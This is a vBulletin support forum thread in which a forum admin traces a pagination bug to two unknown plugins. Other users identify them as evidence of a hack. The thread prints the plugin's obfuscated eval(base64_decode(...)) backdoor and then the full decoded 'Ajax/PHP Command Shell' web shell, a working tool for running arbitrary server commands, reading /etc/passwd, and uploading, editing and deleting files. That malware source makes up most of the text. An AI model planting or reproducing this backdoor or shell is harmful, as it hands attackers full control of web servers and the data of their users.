Hi guys
My forum only shows the first page of all Threads. It happened suddenly. I've not installed any plugins recently.
when i disable all hooks, it gonna be ok !

If you disable hooks and it is OK, then it is one of your modifications causing the issue. So, disable all Products except the vBulletin Blog and vBulletin CMS (Admin CP -> Plugins & Products -> Manage Products -> Disable) AND uncheck all the plugins except those related to the vBulletin Blog and vBulletin CMS by (Admin CP -> Plugins & Products -> Plugin Manager). You must do BOTH of those steps in order to disable all non vBulletin Modifications. Now turn the modifications back on, one-by-one and see if the problem starts again.

i still have the problem
i've disabled all products, and unchecked all plugins but it didn't fix ! as soon as i disable those from (Vbulletin option => plugin/hook system) the problem will be solved, but if i disable those manually i still have the problem !

If it works when you do it via the Options, then you did not completely disable them all via BOTH the Plugin Manager AND the Manage Products page.

Thanks Lynne ;)
Finally i found the corrupted plugin !
Can anyone tell me what is this plugin and what is it for ?
There is two similar plugins. i have to disable first one. if i enable first one and disable second one, I still have the problem ! can I delete it ?
My vB is 3.8.4
https://vborg.vbsupport.ru/external/2011/09/45.jpg

I have no idea what they are, but they are not default vbulletin plugins. Are they exactly the same? What do they do? If you didn't install them, then you should remove them.

I don't know what do they do honestly ! Anyway i disabled both of them and nothing happened at all
the both have same content as i quote here

if (strpos($_SERVER['PHP_SELF'],"subscriptions.php")) {

eval(base64_decode('c2Vzc2lvbl9zdGFydCgpOw0KDQplcn Jvcl9yZXBvcnRpbmcoMCk7DQoNCg0KDQokdmVyc2lvbiA9ICIw LjdCIjsNCg0KJGZ1bmN0aW9ucyA9IGFycmF5KCdDbGVhciBTY3 JlZW4nID0+ICdDbGVhclNjcmVlbigpJywNCidDbGVhciBIaXN0 b3J5JyA9PiAnQ2xlYXJIaXN0b3J5KCknLA0KJ0NhbiBJIGZ1bm N0aW9uPycgPT4gInJ1bmNvbW1hbmQoJ2NhbmlydW4nLCdHRVQn KSIsDQonR2V0IHNlcnZlciBpbmZvJyA9PiAicnVuY29tbWFuZC gnc2hvd2luZm8nLCdHRVQnKSIsDQonUmVhZCAvZXRjL3Bhc3N3 ZCcgPT4gInJ1bmNvbW1hbmQoJ2V0Y3Bhc3N3ZGZpbGUnLCdHRV QnKSIsDQonT3BlbiBwb3J0cycgPT4gInJ1bmNvbW1hbmQoJ25l dHN0YXQgLWFuIHwgZ3JlcCAtaSBsaXN0ZW4nLCdHRVQnKSIsDQ onUnVubmluZyBwcm9jZXNzZXMnID0+ICJydW5jb21tYW5kKCdw cyAtYXV4JywnR0VUJykiLA0KJ1JlYWRtZScgPT4gInJ1bmNvbW 1hbmQoJ3NoZWxsaGVscCcsJ0dFVCcpIg0KDQopOw0KJHRoaXNm aWxlID0gYmFzZW5hbWUoX19GSUxFX18pOw0KDQokc3R5bGUgPS AnPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCi5jbWR0aGluZyB7 DQogICAgYm9yZGVyLXRvcC13aWR0aDogMHB4Ow0KICAgIGZvbn Qtd2VpZ2h0OiBibUxIVFRQIik7DQogICAgICAgICAgICB9IGNh dGNoIChlKXsNCiAgICAgICAgICAgICAgICBhbGVydCgiV2lja2 VkIGVycm9yLCBub3RoaW5nIHdlIGNhbiBkbyBhYm91dCBpdC4u LiIpOw0KICAgICAgICAgICAgICAgIHJldHVybiBmYWxzZTsNCi AgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgIH0NCiAgICBh amF4UmVxdWVzdC5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdG lvbigpew0KICAgICAgICBpZihhamF4UmVxdWVzdC5yZWFkeVN0 YXRlID09IDQpew0KICAgICAgICBvdXRwdXRjbWQgPSAiPHByZT 4iICArIG91dHB1dGNtZCArIGFqYXhSZXF1ZXN0LnJlc3BvbnNl VGV4dCArIjwvcHJlPiI7DQogICAgICAgICAgICBkb2N1bWVudC 5nZXRFbGVtZW50QnlJZCgnb3V0cHV0JykuaW5uZXJIVE1MID0g b3V0cHV0Y21kOw0KICAgICAgICAgICAgdmFyIG9iakRpdiA9IG RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJvdXRwdXQiKTsNCgkJ CW9iakRpdi5zY3JvbGxUb3AgPSBvYmpEaXYuc2Nyb2xsSGVpZ2 h0Ow0KICAgICAgICB9DQogICAgfQ0KICAgIGFqYXhSZXF1ZXN0 Lm9wZW4oYWN0aW9uLCAiP3J1bmNtZD0iK3VybHRvb3BlbiAsIH RydWUpOw0KCWlmKGFjdGlvbiA9PSAiR0VUIikNCgl7DQogICAg YWpheFJlcXVlc3Quc2VuZChudWxsKTsNCgl9DQogICAgZG9jdW 1lbnQuY21kZm9ybS5jb21tYW5kLnZhbHVlPScnOw0KICAgIHJl dHVybiBmYWxzZTsNCn0NCg0KZnVuY3Rpb24gc2V0X3RhYl9odG 1sKG5ld2h0bWwpDQp7DQpkb2N1bWVudC5nZXRFbGVtZW50QnlJ ZCgnY29tbWFuZHRhYicpLmlubmVySFRNTCA9IG5ld2h0bWw7DQ p9DQoNCmZ1bmN0aW9uIHNldF90YWIobmV3dGFiKQ0Kew0KCWlm KG5ld3RhYiA9PSAiY21kIikNCgl7DQoJCW5ld2h0bWwgPSAnJm 5ic3A7Jm5ic3A7Jm5ic3A7PGZvcm0gbmFtZT0iY21kZm9ybSIg b25zdWJtaXQ9InJldHVybiBydW5jb21tYW5kKGRvY3VtZW50Lm NtZGZvcm0uY29tbWFuZC52YWx1ZSxcJ0dFVFwnKTsiPjxiPkNv bW1hbmQ8L2I+OiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9Y29tbW FuZCBjbGFzcz1jbWR0aGluZyBzaXplPTEwMCU+PGJyPjwvZm9y bT4nOw0KCX0NCgllbHNlIGlmKG5ld3RhYiA9PSAidXBsb2FkIi kNCgl7DQoJCXJ1bmNvbW1hbmQoJ3VwbG9hZCcsJ0dFVCcpOw0K CQluZXdodG1sID0gJzxmb250IHNpemU9MD48Yj5UaGlzIHdpbG wgcmVsb2FkIHRoZSBwYWdlLi4uIDooPC9iPjxicj48YnI+PGZv cm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW 9uPSI8P3BocCBwcmludCAkVGhpc0ZpbGU7ID8+IiBtZXRob2Q9 IlBPU1QiPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Ik1BWF 9GSUxFX1NJWkUiIHZhbHVlPSIxMDAwMDAwMCIgLz5DaG9vc2Ug YSBmaWxlIHRvIHVwbG9hZDogPGlucHV0IG5hbWU9InVwbG9hZG VkZmlsZSIgdHlwZT0iZmlsZSIgLz48YnIgLz48aW5wdXQgdHlw ZT0ic3VibWl0IiB2YWx1ZT0iVXBsb2FkIEZpbGUiIC8+PC9mb3 JtPjwvZm9udD4nOw0KCX0NCgllbHNlIGlmKG5ld3RhYiA9PSAi d29ya2luZ2RpciIpDQoJew0KCQk8P3BocA0KCQkkZm9sZGVycy A9ICI8Zm9ybSBuYW1lPXdvcmtkaXIgb25zdWJtaXQ9XCJyZXR1 cm4gcnVuY29tbWFuZChcJ2NoYW5nZXdvcmtkaXIgXCcgKyBkb2 N1bWVudC53b3JrZGlyLmNoYW5nZXdvcmtkaXIudmFsdWUsXCdH RVRcJyk7XCI+PGlucHV0IHNpemU9ODAlIHR5cGU9dGV4dCBuYW 1lPWNoYW5nZXdvcmtkaXIgdmFsdWU9XCIiOw0KCQkkcGF0aHBh cnRzID0gZXhwbG9kZSgiLyIscmVhbHBhdGggKCIuIikpOw0KCQ lmb3JlYWNoKCRwYXRocGFydHMgYXMgJGZvbGRlcikNCgkJew0K CQkkZm9sZGVycyAuPSAkZm9sZGVyLiIvIjsNCgkJfQ0KCQkkZm 9sZGVycyAuPSAiXCI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVl PUNoYW5nZT48L2Zvcm0+PGJyPlNjcmlwdCBkaXJlY3Rvcnk6ID xpIHN0eWxlPVwiY3Vyc29yOmNyb3NzaGFpclwiICBvbmNsaWNr PVwiZG9jdW1lbnQud29ya2Rpci5jaGFuZ2V3b3JrZGlyLnZhbH VlPVwnIi5kaXJuYW1lKF9fRklMRV9fKS4iXCc+Ii5kaXJuYW1l KF9fRklMRV9fKS4iPC9pPiI7DQoNCgkJPz4NCgkJbmV3aHRtbC A9ICc8P3BocCBwcmludCAkZm9sZGVyczsgPz4nOw0KCX0NCgll bHNlIGlmKG5ld3RhYiA9PSAiZmlsZWJyb3dzZXIiKQ0KCXsNCg kJbmV3aHRtbCA9ICc8Yj5GaWxlIGJyb3dzZXIgaXMgdW5kZXIg Y29uc3RydWN0aW9uISBVc2UgYXQgeW91ciBvd24gcmlzayE8L2 I+IDxicj5Zb3UgY2FuIHVzZSBpdCB0byBjaGFuZ2UgeW91ciB3 b3JraW5nIGRpcmVjdG9yeSBlYXNpbHksIGRvblwndCBleHBlY3 QgdG9vIG11Y2ggb2YgaXQuPGJyPkNsaWNrIG9uIGEgZmlsZSB0 byBlZGl0IGl0Ljxicj48aT5bV108L2k+ID0gc2V0IGRpcmVjdG 9yeSBhcyB3b3JraW5nIGRpcmVjdG9yeS48YnI+PGk+W0RdPC9p PiA9IGRlbGV0ZSBmaWxlL2RpcmVjdG9yeSc7DQoJCXJ1bmNvbW 1hbmQoJ2xpc3RkaXIgLicsJ0dFVCcpOw0KCX0NCgllbHNlIGlm KG5ld3RhYiA9PSAiY3JlYXRlZmlsZSIpDQoJew0KCQluZXdodG 1sID0gJzxiPkZpbGUgRWRpdG9yLCB1bmRlciBjb25zdHJ1Y3Rp b24uPC9iPic7DQoJCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKC dvdXRwdXQnKS5pbm5lckhUTUwgPSAiPGZvcm0gbmFtZT1cInNh dmVmb3JtXCI+PHRleHRhcmVhIGNvbHM9NzAgcm93cz0xMCBpZD 1cImFyZWExXCI+PC90ZXh0YXJlYT48YnI+PGlucHV0IHNpemU9 ODAgdHlwZT10ZXh0IG5hbWU9ZmlsZXRvc2F2ZSB2YWx1ZT1cIj w/cGhwIHByaW50IHJlYWxwYXRoKCcuJykuIi8iLnJhbmQoMTAwMC w5OTk5OTkpLiIudHh0IjsgPz5cIj48aW5wdXQgdmFsdWU9XCJT YXZlXCIgdHlwZT1idXR0b24gb25jbGljaz1cIlNhdmVGaWxlKC k7XCI+PC9mb3JtPiI7DQoJCQ0KCX0NCgkJZG9jdW1lbnQuZ2V0 RWxlbWVudEJ5SWQoJ2NvbW1hbmR0YWInKS5pbm5lckhUTUwgPS BuZXdodG1sOw0KfQ0KPC9zY3JpcHQ+DQo8L2hlYWQ+DQo8Ym9k eSBiZ2NvbG9yPWJsYWNrIG9ubG9hZD0ic2YoKTsiIHZsaW5rPX doaXRlIGFsaW5rPXdoaXRlIGxpbms9d2hpdGU+DQo8dGFibGUg Ym9yZGVyPTEgd2lkdGg9MTAwJSBoZWlnaHQ9MTAwJT4NCjx0ZC B3aWR0aD0xNSUgdmFsaWduPXRvcD4NCg0KPGZvcm0gbmFtZT0i ZXh0cmFzIj48YnI+DQo8Y2VudGVyPjxiPlF1aWNrIENvbW1hbm RzPC9iPjxicj4NCg0KPGRpdiBzdHlsZT0nbWFyZ2luOiAwcHg7 cGFkZGluZzogMHB4O2JvcmRlcjogMXB4IGluc2V0O292ZXJmbG 93OiBhdXRvJz4NCjw/cGhwDQpmb3JlYWNoKCRmdW5jdGlvbnMgYXMgJG5hbWUgPT4gJG V4ZWN1dGUpDQp7DQpwcmludCAnJm5ic3A7PGlucHV0IHR5cGU9 ImJ1dHRvbiIgdmFsdWU9IicuJG5hbWUuJyIgb25jbGljaz0iJy 4kZXhlY3V0ZS4nIj48YnI+JzsNCn0NCj8+DQoNCjwvY2VudGVy Pg0KDQo8L2Rpdj4NCjwvZm9ybT4NCjxjZW50ZXI+PGI+Q29tbW FuZCBoaXN0b3J5PC9iPjxicj48L2NlbnRlcj4NCjxkaXYgaWQ9 Imhpc3RvcnkiIHN0eWxlPSdtYXJnaW46IDBweDtwYWRkaW5nOi AwcHg7Ym9yZGVyOiAxcHggaW5zZXQ7d2lkdGg6IDEwMCU7aGVp Z2h0OiAyMCU7dGV4dC1hbGlnbjogbGVmdDtvdmVyZmxvdzogYX V0bztmb250LXNpemU6IDEwcHg7Jz48L2Rpdj4NCjxicj4NCjxj ZW50ZXI+PGI+QWJvdXQ8L2I+PGJyPjwvY2VudGVyPg0KPGRpdi BzdHlsZT0nbWFyZ2luOiAwcHg7cGFkZGluZzogMHB4O2JvcmRl cjogMXB4IGluc2V0O3dpZHRoOiAxMDAlO3RleHQtYWxpZ246IG NlbnRlcjtvdmVyZmxvdzogYXV0bzsgZm9udC1zaXplOiAxMHB4 Oyc+DQo8YnI+DQo8Yj48Zm9udCBzaXplPTM+QWpheC9QSFAgQ2 9tbWFuZCBTaGVsbDwvYj48L2ZvbnQ+PGJyPmJ5IElyb25maXN0 DQo8YnI+DQpWZXJzaW9uIDw/cGhwIHByaW50ICR2ZXJzaW9uOyA/Pg0KDQo8YnI+DQo8YnI+DQoNCjxicj5UaGFua3MgdG8gZXZlcn lvbmUgQCANCjxhIGhyZWY9Imh0dHA6Ly93d3cuaXJvbndhcmV6 LmluZm8iIHRhcmdldD1fYmxhbms+U2hhcmVQbGF6YTwvYT4NCj xicj4NCjxhIGhyZWY9Imh0dHA6Ly93d3cubWlsdzBybS5jb20i IHRhcmdldD1fYmxhbms+bWlsdzBybTwvYT4NCjxicj4NCmFuZC BzcGVjaWFsIGdyZWV0aW5ncyB0byBldmVyeW9uZSBpbiByb290 c2hlbGwNCjwvZGl2Pg0KDQo8L3RkPg0KPHRkIHdpZHRoPTcwJT 4NCjx0YWJsZSBib3JkZXI9MCB3aWR0aD0xMDAlIGhlaWdodD0x MDAlPjx0ZCBpZD0idGFicyIgaGVpZ2h0PTElPjxmb250IHNpem U9MD4NCjxiIHN0eWxlPSJjdXJzb3I6Y3Jvc3NoYWlyIiBvbmNs aWNrPSJzZXRfdGFiKCdjbWQnKTsiPltFeGVjdXRlIGNvbW1hbm RdPC9iPiANCjxiIHN0eWxlPSJjdXJzb3I6Y3Jvc3NoYWlyIiBv bmNsaWNrPSJzZXRfdGFiKCd1cGxvYWQnKTsiPltVcGxvYWQgZm lsZV08L2I+IA0KPGIgc3R5bGU9ImN1cnNvcjpjcm9zc2hhaXIi IG9uY2xpY2s9InNldF90YWIoJ3dvcmtpbmdkaXInKTsiPltDaG FuZ2UgZGlyZWN0b3J5XTwvYj4gDQo8YiBzdHlsZT0iY3Vyc29y OmNyb3NzaGFpciIgb25jbGljaz0ic2V0X3RhYignZmlsZWJyb3 dzZXInKTsiPltGaWxlYnJvd3Nlcl08L2I+IA0KPGIgc3R5bGU9 ImN1cnNvcjpjcm9zc2hhaXIiIG9uY2xpY2s9InNldF90YWIoJ2 NyZWF0ZWZpbGUnKTsiPltDcmVhdGUgRmlsZV08L2I+IA0KDQo8 L2ZvbnQ+PC90ZD4NCjx0cj4NCjx0ZCBoZWlnaHQ9OTklIHdpZH RoPTEwMCUgdmFsaWduPXRvcD48ZGl2IGlkPSJvdXRwdXQiIHN0 eWxlPSdoZWlnaHQ6MTAwJTt3aGl0ZS1zcGFjZTpwcmU7b3Zlcm Zsb3c6YXV0byc+PC9kaXY+DQoNCjx0cj4NCjx0ZCAgaGVpZ2h0 PTElIHdpZHRoPTEwMCUgdmFsaWduPXRvcD4NCjxkaXYgaWQ9Im NvbW1hbmR0YWIiIHN0eWxlPSdoZWlnaHQ6MTAwJTt3aGl0ZS1z cGFjZTpwcmU7b3ZlcmZsb3c6YXV0byc+DQombmJzcDsmbmJzcD smbmJzcDs8Zm9ybSBuYW1lPSJjbWRmb3JtIiBvbnN1Ym1pdD0i cmV0dXJuIHJ1bmNvbW1hbmQoZG9jdW1lbnQuY21kZm9ybS5jb2 1tYW5kLnZhbHVlLCdHRVQnKTsiPg0KPGI+Q29tbWFuZDwvYj46 IDxpbnB1dCB0eXBlPXRleHQgbmFtZT1jb21tYW5kIGNsYXNzPW NtZHRoaW5nIHNpemU9MTAwJT48YnI+DQo8L2Zvcm0+DQo8L2Rp dj4NCjwvdGQ+DQo8L3RhYmxlPg0KPC90ZD4NCjwvdGFibGU+DQ o8L2JvZHk+DQo8L2h0bWw+DQo8P3BocA0KfQ0KfSBlbHNlIHsN CnByaW50ICI8Y2VudGVyPjx0YWJsZSBib3JkZXI9MCAgaGVpZ2 h0PTEwMCU+DQo8dGQgdmFsaWduPW1pZGRsZT4NCjxmb3JtIGFj dGlvbj0iLmJhc2VuYW1lKF9fRklMRV9fKS4iIG1ldGhvZD1QT1 NUPllvdSBhcmUgbm90IGxvZ2dlZCBpbiwgcGxlYXNlIGxvZ2lu Ljxicj48Yj5QYXNzd29yZDo8L2I+PGlucHV0IHR5cGU9cGFzc3 dvcmQgbmFtZT1wNHNzdzByRD48aW5wdXQgdHlwZT1zdWJtaXQg dmFsdWU9XCJMb2cgaW5cIj4NCjwvZm9ybT4iOw0KfQ=='));

exit;
}

I hate to tell you, but you've most likely been hacked. base64 is never a good thing to see in any of your code. I would remove those and look at your access_logs to see how they did this. You may need to ask your host for help.

here is full of the code ;)
http://www.mediafire.com/?cscsok6c1mfz6b4

I'm waiting for your response.

I'm not sure what response you want from me. You've been hacked. You need to talk to your host about how this happened and how to fix the issue.

You may google for a base64 converter to find out what that code does. Just to let you know, but this is in part of the comments:
The shell can be used by anyone to command any server, .....

that's decode:

session_start();

error_reporting(0);



$version = "0.7B";

$functions = array('Clear Screen' => 'ClearScreen()',
'Clear History' => 'ClearHistory()',
'Can I function?' => "runcommand('canirun','GET')",
'Get server info' => "runcommand('showinfo','GET')",
'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
'Running processes' => "runcommand('ps -aux','GET')",
'Readme' => "runcommand('shellhelp','GET')"

);
$thisfile = basename(__FILE__);

$style = '<style type="text/css">
.cmdthing {
border-top-width: 0px;
font-weight: bold;
border-left-width: 0px;
font-size: 10px;
border-left-color: #000000;
background: #000000;
border-bottom-width: 0px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #008000;
font-family: verdana;
border-right-width: 0px;
border-right-color: #000000;
}
input,textarea {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #FFFFFF;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #FFFFFF;
font-family: verdana;
border-right-width: 1px;
border-right-color: #FFFFFF;
}
A:hover {
text-decoration: none;
}


table,td,div {
border-collapse: collapse;
border: 1px solid #FFFFFF;
}
body {
color: #FFFFFF;
font-family: verdana;
}
</style>';
$sess = __FILE__.$password;
if(isset($_POST['p4ssw0rD']))
{
if($_POST['p4ssw0rD'] == $password)
{
$_SESSION[$sess] = $_POST['p4ssw0rD'];
}
else
{
die("Wrong password");
}

}
if($_SESSION[$sess] == $password)
{
if(isset($_SESSION['workdir']))
{
if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
{
chdir($_SESSION['workdir']);
}
}

if(isset($_FILES['uploadedfile']['name']))
{
$target_path = "./";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {

}
}

if(isset($_GET['runcmd']))
{

$cmd = $_GET['runcmd'];

print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";

if($cmd == "")
{
print "Empty Command..type \"shellhelp\" for some ehh...help";
}

elseif($cmd == "upload")
{
print '<br>Uploading to: '.realpath(".");
if(is_writable(realpath(".")))
{
print "<br><b>I can write to this directory</b>";
}
else
{
print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
}

}
elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
{
if(file_exists($file[1]) && is_dir($file[1]))
{
chdir($file[1]);
$_SESSION['workdir'] = $file[1];
print "Current directory changed to ".$file[1];
}
else
{
print "Directory not found";
}
}

elseif(strtolower($cmd) == "shellhelp")
{
print '<b><font size=7>Ajax/PHP Command Shell</b></font>
&copy; By Ironfist

The shell can be used by anyone to command any server, the main purpose was
to create a shell that feels as dynamic as possible, is expandable and easy
to understand.

If one of the command execution functions work, the shell will function fine.
Try the "canirun" command to check this.

Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
not used to these commands, google a little.

<b>Custom Functions</b>
If you want to add your own custom command in the Quick Commands list, check
out the code. The $function array contains \'func name\' => \'javascript function\'.
Take a look at the built-in functions for examples.

I know this readme isn\'t providing too much information, but hell, does this shell
even require one :P

- Iron
';

}
elseif(ereg("editfile (.*)",$cmd,$file))
{
if(file_exists($file[1]) && !is_dir($file[1]))
{
print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
$contents = file($file[1]);
foreach($contents as $line)
{
print htmlspecialchars($line);
}
print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
}
else
{
print "File not found.";
}
}
elseif(ereg("deletefile (.*)",$cmd,$file))
{
if(is_dir($file[1]))
{
if(rmdir($file[1]))
{
print "Directory succesfully deleted.";
}
else
{
print "Couldn't delete directory!";
}
}
else
{
if(unlink($file[1]))
{
print "File succesfully deleted.";
}
else
{
print "Couldn't delete file!";
}
}
}
elseif(strtolower($cmd) == "canirun")
{
print "If any of these functions is Enabled, the shell will function like it should.<br>";
if(function_exists(passthru))
{
print "Passthru: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Passthru: <b><font color=red>Disabled</b></font><br>";
}

if(function_exists(exec))
{
print "Exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Exec: <b><font color=red>Disabled</b></font><br>";
}

if(function_exists(system))
{
print "System: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "System: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(shell_exec))
{
print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
}
print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
if( ini_get('safe_mode') ){
print "Safe Mode: <b><font color=red>Enabled</b></font>";
}
else
{
print "Safe Mode: <b><font color=green>Disabled</b></font>";
}
print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
if( ini_get('open_basedir') ){
print "Open_basedir: <b><font color=red>Enabled</b></font>";
}
else
{
print "Open_basedir: <b><font color=green>Disabled</b></font>";
}
}
//About the shell
elseif(ereg("listdir (.*)",$cmd,$directory))
{

if(!file_exists($directory[1]))
{
die("Directory not found");
}
//Some variables
chdir($directory[1]);
$i = 0; $f = 0;
$dirs = "";
$filez = "";

if(!ereg("/$",$directory[1])) //Does it end with a slash?
{
$directory[1] .= "/"; //If not, add one
}
print "Listing directory: ".$directory[1]."<br>";
print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";

if ($handle = opendir($directory[1])) {
while (false !== ($file = readdir($handle))) {
if(is_dir($file))
{
$dirs[$i] = $file;
$i++;
}
else
{
$filez[$f] = $file;
$f++;
}

}
print "<td>";

foreach($dirs as $directory)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
}

print "</td><td>";

foreach($filez as $file)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
}

print "</td></table>";
}
}
elseif(strtolower($cmd) == "about")
{
print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
}
//Show info
elseif(strtolower($cmd) == "showinfo")
{
if(function_exists(disk_free_space))
{
$free = disk_free_space("/") / 1000000;
}
else
{
$free = "N/A";
}
if(function_exists(disk_total_space))
{
$total = trim(disk_total_space("/") / 1000000);
}
else
{
$total = "N/A";
}
$path = realpath (".");

print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";

if(function_exists(passthru))
{
passthru("uname -a");
}
else
{
print "Passthru is disabled :(";
}
}
//Read /etc/passwd
elseif(strtolower($cmd) == "etcpasswdfile")
{

$pw = file('/etc/passwd/');
foreach($pw as $line)
{
print $line;
}


}
//Execute any other command
else
{

if(function_exists(passthru))
{
passthru($cmd);
}
else
{
if(function_exists(exec))
{
exec("ls -la",$result);
foreach($result as $output)
{
print $output."<br>";
}
}
else
{
if(function_exists(system))
{
system($cmd);
}
else
{
if(function_exists(shell_exec))
{
print shell_exec($cmd);
}
else
{
print "Sorry, none of the command functions works.";
}
}
}
}
}
}

elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
{
$file = $_POST['filetosave'];
if(!is_writable($file))
{
if(!chmod($file, 0777))
{
die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
}
}

$fh = fopen($file, 'w');
$dt = $_POST['filecontent'];
fwrite($fh, $dt);
fclose($fh);
}
else
{
?>
<html>
<title>mihandownload<?php print getenv("HTTP_HOST"); ?></title>
<head>
<?php print $style; ?>
<SCRIPT TYPE="text/javascript">
function sf(){document.cmdform.command.focus();}
var outputcmd = "";
var cmdhistory = "";
function ClearScreen()
{
outputcmd = "";
document.getElementById('output').innerHTML = outputcmd;
}

function ClearHistory()
{
cmdhistory = "";
document.getElementById('history').innerHTML = cmdhistory;
}

function deletefile(file)
{
deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
if(deleteit)
{
runcommand('deletefile ' + file,'GET');
}
}

var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType('text/html');
}
} else if (window.ActiveXObject) {
try {
http_request = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {}
}
}
if (!http_request) {
alert('Cannot create XMLHTTP instance');
return false;
}


http_request.open('POST', url, true);
http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http_request.setRequestHeader("Content-length", parameters.length);
http_request.setRequestHeader("Connection", "close");
http_request.send(parameters);
}


function SaveFile()
{
var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
"&filecontent=" + encodeURI( document.getElementById("area1").value );
makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
}

function runcommand(urltoopen,action,contenttosend){
cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
document.getElementById('history').innerHTML = cmdhistory;
if(urltoopen == "clear")
{
ClearScreen();
}
var ajaxRequest;
try{
ajaxRequest = new XMLHttpRequest();
} catch (e){
try{
ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try{
ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e){
alert("Wicked error, nothing we can do about it...");
return false;
}
}
}
ajaxRequest.onreadystatechange = function(){
if(ajaxRequest.readyState == 4){
outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
document.getElementById('output').innerHTML = outputcmd;
var objDiv = document.getElementById("output");
objDiv.scrollTop = objDiv.scrollHeight;
}
}
ajaxRequest.open(action, "?runcmd="+urltoopen , true);
if(action == "GET")
{
ajaxRequest.send(null);
}
document.cmdform.command.value='';
return false;
}

function set_tab_html(newhtml)
{
document.getElementById('commandtab').innerHTML = newhtml;
}

function set_tab(newtab)
{
if(newtab == "cmd")
{
newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\') ;"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
}
else if(newtab == "upload")
{
runcommand('upload','GET');
newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
}
else if(newtab == "workingdir")
{
<?php
$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
$pathparts = explode("/",realpath ("."));
foreach($pathparts as $folder)
{
$folders .= $folder."/";
}
$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";

?>
newhtml = '<?php print $folders; ?>';
}
else if(newtab == "filebrowser")
{
newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
runcommand('listdir .','GET');
}
else if(newtab == "createfile")
{
newhtml = '<b>File Editor, under construction.</b>';
